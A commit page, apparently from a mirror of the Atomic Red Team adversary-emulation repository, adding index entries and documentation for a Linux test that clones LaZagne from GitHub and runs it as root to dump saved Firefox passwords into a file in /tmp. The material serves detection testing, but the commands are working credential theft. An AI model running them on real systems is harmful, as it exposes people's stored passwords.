security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generated docs from job=generate-docs branch=master [ci skip]

Browse Source
This commit is contained in:
Atomic Red Team doc generator
2022-05-01 05:11:40 +00:00
parent 0bf889be40
commit ffb8cda982
8 changed files with 104 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Indexes-CSV/index.csv
+1
View File
@@ -30,6 +30,7 @@ credential-access,T1555.003,Credentials from Web Browsers,5,Simulating access to
credential-access,T1555.003,Credentials from Web Browsers,6,Simulating access to Windows Firefox Login Data,eb8da98a-2e16-4551-b3dd-83de49baa14c,powershell
credential-access,T1555.003,Credentials from Web Browsers,7,Simulating access to Windows Edge Login Data,a6a5ec26-a2d1-4109-9d35-58b867689329,powershell
credential-access,T1555.003,Credentials from Web Browsers,8,Decrypt Mozilla Passwords with Firepwd.py,dc9cd677-c70f-4df5-bd1c-f114af3c2381,powershell
credential-access,T1555.003,Credentials from Web Browsers,9,LaZagne.py - Dump Credentials from Firefox Browser,87e88698-621b-4c45-8a89-4eaebdeaabb1,sh
credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
credential-access,T1003.006,DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
30 credential-access T1555.003 Credentials from Web Browsers 6 Simulating access to Windows Firefox Login Data eb8da98a-2e16-4551-b3dd-83de49baa14c powershell
31 credential-access T1555.003 Credentials from Web Browsers 7 Simulating access to Windows Edge Login Data a6a5ec26-a2d1-4109-9d35-58b867689329 powershell
32 credential-access T1555.003 Credentials from Web Browsers 8 Decrypt Mozilla Passwords with Firepwd.py dc9cd677-c70f-4df5-bd1c-f114af3c2381 powershell
33 credential-access T1555.003 Credentials from Web Browsers 9 LaZagne.py - Dump Credentials from Firefox Browser 87e88698-621b-4c45-8a89-4eaebdeaabb1 sh
34 credential-access T1552.002 Credentials in Registry 1 Enumeration for Credentials in Registry b6ec082c-7384-46b3-a111-9a9b8b14e5e7 command_prompt
35 credential-access T1552.002 Credentials in Registry 2 Enumeration for PuTTY Credentials in Registry af197fd7-e868-448e-9bd5-05d1bcd9d9e5 command_prompt
36 credential-access T1003.006 DCSync 1 DCSync (Active Directory) 129efd28-8497-4c87-a1b0-73b9a870ca3e command_prompt
atomics/Indexes/Indexes-CSV/linux-index.csv
+1
View File
@@ -9,6 +9,7 @@ credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes ser
credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1555.003,Credentials from Web Browsers,9,LaZagne.py - Dump Credentials from Firefox Browser,87e88698-621b-4c45-8a89-4eaebdeaabb1,sh
credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
credential-access,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
9 credential-access T1110.004 Credential Stuffing 1 SSH Credential Stuffing From Linux 4f08197a-2a8a-472d-9589-cd2895ef22ad bash
10 credential-access T1552.001 Credentials In Files 2 Extract passwords with grep bd4cf0d1-7646-474e-8610-78ccf5a097c4 sh
11 credential-access T1552.001 Credentials In Files 5 Find and Access Github Credentials da4f751a-020b-40d7-b9ff-d433b7799803 bash
12 credential-access T1555.003 Credentials from Web Browsers 9 LaZagne.py - Dump Credentials from Firefox Browser 87e88698-621b-4c45-8a89-4eaebdeaabb1 sh
13 credential-access T1056.001 Keylogging 2 Living off the land Terminal Input Capture on Linux with pam.d 9c6bdb34-a89f-4b90-acb1-5970614c711b sh
14 credential-access T1056.001 Keylogging 3 Logging bash history to syslog 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 sh
15 credential-access T1056.001 Keylogging 4 Bash session based keylogger 7f85a946-a0ea-48aa-b6ac-8ff539278258 sh
atomics/Indexes/Indexes-Markdown/index.md
+1
View File
@@ -45,6 +45,7 @@
- Atomic Test #6: Simulating access to Windows Firefox Login Data [windows]
- Atomic Test #7: Simulating access to Windows Edge Login Data [windows]
- Atomic Test #8: Decrypt Mozilla Passwords with Firepwd.py [windows]
- Atomic Test #9: LaZagne.py - Dump Credentials from Firefox Browser [linux]
- [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md)
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
atomics/Indexes/Indexes-Markdown/linux-index.md
+2 -1
View File
@@ -20,7 +20,8 @@
- Atomic Test #2: Extract passwords with grep [macos, linux]
- Atomic Test #5: Find and Access Github Credentials [macos, linux]
- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.003 Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #9: LaZagne.py - Dump Credentials from Firefox Browser [linux]
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.002 GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
atomics/Indexes/Matrices/linux-matrix.md
+1 -1
View File
@@ -11,7 +11,7 @@
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cron](../../T1053.003/T1053.003.md) | [Cloud Accounts](../../T1078.004/T1078.004.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | Cloud Storage Object Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Compile After Delivery](../../T1027.004/T1027.004.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Clipboard Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cloud Account](../../T1136.003/T1136.003.md) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cloud Accounts](../../T1078.004/T1078.004.md) | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create Snapshot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cloud Accounts](../../T1078.004/T1078.004.md) | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create Snapshot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Delete Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Escape to Host](../../T1611/T1611.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
atomics/Indexes/index.yaml
+35
View File
@@ -1779,6 +1779,41 @@ credential-access:
cat #{Out_Filepath}
cleanup_command: "Remove-Item -Path \"#{Out_Filepath}\" -erroraction silentlycontinue
\ \n"
- name: LaZagne.py - Dump Credentials from Firefox Browser
auto_generated_guid: 87e88698-621b-4c45-8a89-4eaebdeaabb1
description: Credential Dump Ubuntu 20.04.4 LTS Focal Fossa Firefox Browser,
Reference https://github.com/AlessandroZ/LaZagne
supported_platforms:
- linux
input_arguments:
lazagne_path:
description: Path you put LaZagne Github with LaZagne.py
type: String
default: "/tmp/LaZagne/Linux"
specific_module:
description: You may change the module to "all" for all password that can
be found by LaZagne.py
type: string
default: browsers -firefox
output_file:
description: This is where output for the Firefox passwords goes
type: String
default: "/tmp/firefox_password.txt"
dependency_executor_name: sh
dependencies:
- description: Get Lazagne from Github and install requirements
prereq_command: 'test -f #{lazagne_path}/laZagne.py'
get_prereq_command: cd /tmp; git clone https://github.com/AlessandroZ/LaZagne;
cd /tmp/LaZagne/; pip install -r requirements.txt
- description: Needs git, python3 and some pip stuff
prereq_command: which git && which python3 && which pip
get_prereq_command: apt install git; apt install python3-pip -y; pip install
pyasn1 psutil Crypto
executor:
command: 'python3 #{lazagne_path}/laZagne.py #{specific_module} >> #{output_file}'
cleanup_command: 'rm -R /tmp/LaZagne; rm -f #{output_file}'
name: sh
elevation_required: true
T1552.002:
technique:
object_marking_refs:
atomics/T1555.003/T1555.003.md
+62
View File
@@ -28,6 +28,8 @@ After acquiring credentials from web browsers, adversaries may attempt to recycl
- [Atomic Test #8 - Decrypt Mozilla Passwords with Firepwd.py](#atomic-test-8---decrypt-mozilla-passwords-with-firepwdpy)
- [Atomic Test #9 - LaZagne.py - Dump Credentials from Firefox Browser](#atomic-test-9---lazagnepy---dump-credentials-from-firefox-browser)
<br/>
@@ -517,4 +519,64 @@ if (test-path "#{VS_CMD_Path}"){pip install pyasn1 | out-null | cmd /c %comspec%
<br/>
<br/>
## Atomic Test #9 - LaZagne.py - Dump Credentials from Firefox Browser
Credential Dump Ubuntu 20.04.4 LTS Focal Fossa Firefox Browser, Reference https://github.com/AlessandroZ/LaZagne
**Supported Platforms:** Linux
**auto_generated_guid:** 87e88698-621b-4c45-8a89-4eaebdeaabb1
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| lazagne_path | Path you put LaZagne Github with LaZagne.py | String | /tmp/LaZagne/Linux|
| specific_module | You may change the module to "all" for all password that can be found by LaZagne.py | string | browsers -firefox|
| output_file | This is where output for the Firefox passwords goes | String | /tmp/firefox_password.txt|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
python3 #{lazagne_path}/laZagne.py #{specific_module} >> #{output_file}
```
#### Cleanup Commands:
```sh
rm -R /tmp/LaZagne; rm -f #{output_file}
```
#### Dependencies: Run with `sh`!
##### Description: Get Lazagne from Github and install requirements
##### Check Prereq Commands:
```sh
test -f #{lazagne_path}/laZagne.py
```
##### Get Prereq Commands:
```sh
cd /tmp; git clone https://github.com/AlessandroZ/LaZagne; cd /tmp/LaZagne/; pip install -r requirements.txt
```
##### Description: Needs git, python3 and some pip stuff
##### Check Prereq Commands:
```sh
which git && which python3 && which pip
```
##### Get Prereq Commands:
```sh
apt install git; apt install python3-pip -y; pip install pyasn1 psutil Crypto
```
<br/>